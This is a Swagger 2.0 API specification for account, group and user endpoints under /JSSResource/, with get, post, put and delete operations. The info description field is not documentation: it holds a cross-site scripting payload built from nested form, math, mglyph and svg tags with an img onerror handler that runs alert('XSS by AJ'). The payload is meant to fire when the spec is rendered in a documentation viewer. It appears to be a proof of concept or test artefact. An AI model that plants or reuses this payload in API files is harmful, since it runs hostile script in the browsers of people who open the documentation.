swagger: '2.0'
info:
  title: API Resource Documentation
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><XSS by AJ><path id="</XSS by AJ><img onerror=alert('XSS by AJ') src=1>"></form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      responses:
        '200':
          description: Returns a list of all accounts.
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts

  '/accounts/groupid/{id}':
    delete:
      parameters:
        - description: The ID of the group to delete.
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: Successfully deleted the group.
      tags:
        - accounts
      operationId: deleteGroupById
      summary: Deletes a group by ID

    get:
      parameters:
        - description: ID to filter groups.
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: Returns group details.
      tags:
        - accounts
      operationId: findGroupsById
      summary: Finds groups by ID

    post:
      parameters:
        - description: Cannot create an LDAP group with POST.
          in: path
          name: id
          required: true
          type: string
      responses:
        '200':
          description: No response was specified.
      tags:
        - accounts
      operationId: createGroupById
      summary: Creates a new group by ID

    put:
      parameters:
        - description: Cannot update an LDAP group with PUT.
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: Successfully updated the group.
      tags:
        - accounts
      operationId: updateGroupById
      summary: Updates an existing group by ID

  '/accounts/groupname/{name}':
    get:
      parameters:
        - description: Name to filter groups.
          in: path
          name: name
          required: true
          type: string
      responses:
        '200':
          description: Returns groups matching the name.
      tags:
        - accounts
      operationId: findGroupsByName
      summary: Finds groups by name

  '/accounts/userid/{id}':
    delete:
      parameters:
        - description: The ID of the user to delete.
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: Successfully deleted the user.
      tags:
        - accounts
      operationId: deleteUserById
      summary: Deletes a user by ID

    get:
      parameters:
        - description: ID to filter users.
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: Returns user details.
      tags:
        - accounts
      operationId: findUsersById
      summary: Finds users by ID

    post:
      parameters:
        - description: Cannot create an LDAP account with POST.
          in: path
          name: id
          required: true
          type: string
      responses:
        '200':
          description: No response was specified.
      tags:
        - accounts
      operationId: createUserById
      summary: Creates a new user by ID

    put:
      parameters:
        - description: Cannot update an LDAP account with PUT.
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: Successfully updated the user.
      tags:
        - accounts
      operationId: updateUserById
      summary: Updates an existing user by ID

  '/accounts/username/{name}':
    get:
      parameters:
        - description: Name to filter users.
          in: path
          name: name
          required: true
          type: string
      responses:
        '200':
          description: Returns users matching the name.
      tags:
        - accounts
      operationId: findUsersByName
      summary: Finds users by name
